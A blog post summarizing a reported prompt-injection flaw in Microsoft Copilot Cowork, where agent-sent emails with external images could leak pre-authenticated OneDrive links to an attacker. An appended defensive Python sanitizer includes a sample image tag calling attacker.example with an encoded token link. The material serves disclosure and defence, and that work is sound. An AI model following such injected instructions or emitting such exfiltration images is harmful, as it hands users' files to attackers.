Microsoft Copilot Cowork Exfiltrates Files

Simon Willison's Blog News

Summary

A security vulnerability in Microsoft Copilot Cowork allows attackers to exfiltrate files by exploiting prompt injection that triggers external image requests, potentially leaking pre-authenticated download links.


Cached at: 05/26/26, 06:46 PM

# Microsoft Copilot Cowork Exfiltrates Files

Source: [https://simonwillison.net/2026/May/26/copilot-cowork-exfiltrates-files/](https://simonwillison.net/2026/May/26/copilot-cowork-exfiltrates-files/)

26th May 2026 - Link Blog

**[Microsoft Copilot Cowork Exfiltrates Files](https://www.promptarmor.com/resources/microsoft-copilot-cowork-exfiltrates-files)** ([via](https://news.ycombinator.com/item?id=48272354))

The biggest challenge in designing agentic systems continues to be preventing them from enabling attackers to exfiltrate data. In this case Microsoft Copilot Cowork (yes, that's [a real product name](https://www.microsoft.com/en-us/microsoft-365/blog/2026/03/09/copilot-cowork-a-new-way-of-getting-work-done/)) was allowing agents to send emails to the user's own inbox without approval... but those messages were then displayed in a way that could leak data to an attacker via rendered images:

> Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message sent by the agent. Since OneDrive can create pre-authenticated download links, a successful prompt injection could cause those links to be leaked, allowing files to be downloaded by the attacker.
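
One mitigation for the rendering path described above, as an added example that is not code from the original post, PromptArmor or Microsoft: a deny-by-default sanitizer that rebuilds an agent-authored HTML message without `<img>` sources outside an allowlist, and flags blocked image URLs that carry a nested URL. The allowlisted host, the function and class names, and the sample body are assumptions constructed for illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Assumption: the only remote hosts the mail view may fetch images from.
ALLOWED_IMAGE_HOSTS = {"static.intranet.example"}

def image_is_safe(parts):
    """Deny by default: embedded (cid:/data:) or allowlisted HTTPS images only."""
    return parts.scheme in ("cid", "data") or (
        parts.scheme == "https" and parts.hostname in ALLOWED_IMAGE_HOSTS)

class AgentMailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.findings = [], []

    def handle_starttag(self, tag, attrs):
        kept = []
        for name, value in attrs:
            candidates = (value or "").split(",") if name == "srcset" else [value or ""]
            urls = candidates if tag == "img" and name in ("src", "srcset") else []
            blocked = [p for p in map(urlsplit, map(str.strip, urls)) if not image_is_safe(p)]
            for p in blocked:
                # Heuristic: a URL nested in the path or query suggests a leaked link.
                nested = "://" in unquote(p.path + "?" + p.query)
                self.findings.append({"host": p.hostname, "carries_url": nested})
            if not blocked:
                kept.append(name if value is None else f'{name}="{html.escape(value)}"')
        self.out.append("<" + " ".join([tag] + kept) + ">")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # void element: emit no closing tag

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

def sanitize_agent_mail(body):
    parser = AgentMailSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out), parser.findings

# Constructed sample: an injected image whose URL carries a placeholder link.
SAMPLE_BODY = ('<p>Report ready.</p><img src="https://attacker.example/p.png?'
               'd=https%3A%2F%2Ftenant.example%2Fdl%3Ftoken%3DPLACEHOLDER">')
```

Only `<img>` `src` and `srcset` are handled here; CSS `url()` values and other elements that fetch on render would need the same deny-by-default treatment.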
